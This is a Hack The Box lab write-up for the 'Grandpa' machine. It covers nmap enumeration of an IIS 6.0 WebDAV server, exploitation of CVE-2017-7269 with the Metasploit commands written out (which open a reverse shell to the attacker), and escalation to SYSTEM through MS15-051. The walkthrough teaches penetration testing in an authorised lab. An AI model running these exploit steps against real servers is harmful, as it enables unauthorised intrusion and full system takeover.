HTB Writeup - Grandpa
Enumeration
As usual, we start off with an nmap scan to get a listing of open ports and running services:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
| http-webdav-scan:
| WebDAV type: Unknown
| Server Date: Sat, 14 Sep 2024 03:21:24 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Type: Microsoft-IIS/6.0
|_http-server-header: Microsoft-IIS/6.0
We only find one port open, port 80 for serving a web application. Going to the site reveals the generic Under Construction page from IIS 6.0.
IIS 6.0 has a well known exploit tracked as CVE-2017-7269 with many public proof of concept exploits available in GitHub and a good one in metasploit.
Exploitation of CVE-2017-7269
This is a simple thing to exploit with metasploit. I tried other people’s python scripts for it and as usual, the code is so dodgy and hard to run because of poorly maintained python versions and packages. Using metasploit:
use windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS $target
set LHOST tun0
run
We successfully get a shell using this module. Since we are already in metasploit, we can then use local_exploit_suggester in lieu of winpeas to do some quick analysis of potential privilege escalation vectors. If you get errors like:
stdapi_sys_config_getuid: Operation failed: Access is denied
Then you will need to migrate to another process of similar privileges on the host.
CTRL+Z and then use local_exploit_suggester and run.
One of the results returned is windows/local/ms15_051_client_copy_image and execution of this will achieve a NT AUTHORITY/System shell.
This abuses poor object handling in the win32k.sys kernel mode driver allowing code execution.